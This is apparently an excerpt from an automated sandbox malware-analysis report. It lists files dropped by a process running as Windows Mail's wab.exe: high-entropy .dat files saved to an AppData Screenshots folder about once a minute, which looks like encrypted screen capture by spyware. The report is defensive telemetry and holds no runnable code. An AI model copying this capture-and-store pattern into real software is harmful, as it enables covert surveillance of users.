              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201938.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181922.dat entropy: 7.99902079555Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202038.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182023.dat entropy: 7.99902079555Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202138.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182123.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202238.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182223.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202339.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182323.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202439.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182423.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202539.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182523.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202639.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182623.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202739.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182723.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202841.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182823.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_202941.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_182923.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203041.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183023.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165008.dat entropy: 7.99867593907Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165108.dat entropy: 7.99867593907Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165208.dat entropy: 7.99860501643Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165309.dat entropy: 7.99867593907Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165410.dat entropy: 7.99867593907Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203141.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183123.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203242.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183224.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203342.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183324.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203442.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183424.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203542.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183524.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203643.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183624.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203743.dat entropy: 7.99894349391Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183724.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203845.dat entropy: 7.99902079555Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183824.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_203945.dat entropy: 7.99902079555Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_183924.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204045.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184024.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165510.dat entropy: 7.99872222674Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165613.dat entropy: 7.99879120792Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165713.dat entropy: 7.99874750746Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165813.dat entropy: 7.99872867954Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_165913.dat entropy: 7.99868252054Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170013.dat entropy: 7.99882509689Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170114.dat entropy: 7.99882509689Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170214.dat entropy: 7.99885012096Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170314.dat entropy: 7.99885012096Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204145.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184124.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204246.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184224.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204346.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184324.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204446.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184424.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204546.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184525.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204648.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184625.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204748.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184725.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204849.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184825.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_204949.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_184925.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205049.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185025.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170414.dat entropy: 7.99868252054Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170514.dat entropy: 7.99868252054Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170614.dat entropy: 7.99870003625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170714.dat entropy: 7.99870003625Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170814.dat entropy: 7.99885532888Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_170914.dat entropy: 7.99877958233Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171014.dat entropy: 7.99877958233Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171115.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171215.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205150.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185125.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205250.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185225.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205350.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185325.dat entropy: 7.99902079555Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205452.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185425.dat entropy: 7.99902079555Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205553.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185526.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205653.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185626.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205754.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185726.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205854.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185826.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_205954.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_185926.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210057.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190026.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171315.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171415.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171515.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171615.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171715.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171815.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_171915.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172015.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172115.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172215.dat entropy: 7.9986084329Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210157.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190126.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210258.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190226.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210358.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190326.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210458.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190426.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210559.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190526.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210701.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190626.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210801.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190726.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_210902.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190827.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211002.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_190927.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211102.dat entropy: 7.99910363038Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191027.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172315.dat entropy: 7.99883063371Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172416.dat entropy: 7.99885970705Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172516.dat entropy: 7.99892931724Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172616.dat entropy: 7.99890212384Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172716.dat entropy: 7.99894731837Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172816.dat entropy: 7.9989227553Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_172916.dat entropy: 7.9989227553Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173016.dat entropy: 7.9989227553Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173116.dat entropy: 7.99894731837Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173216.dat entropy: 7.99889616701Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211205.dat entropy: 7.99900846116Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191127.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211306.dat entropy: 7.99900846116Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191227.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211406.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191327.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211509.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191427.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211609.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191527.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211709.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191627.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211810.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191727.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_211910.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191827.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212013.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_191927.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212113.dat entropy: 7.99897665953Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_192028.dat entropy: 7.99901409683Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173316.dat entropy: 7.99895904916Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173416.dat entropy: 7.99890940863Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173517.dat entropy: 7.99890940863Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173617.dat entropy: 7.99890940863Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173717.dat entropy: 7.99895904916Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173817.dat entropy: 7.99895904916Jump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_173917.dat entropy: 7.99895904916Jump to dropped file
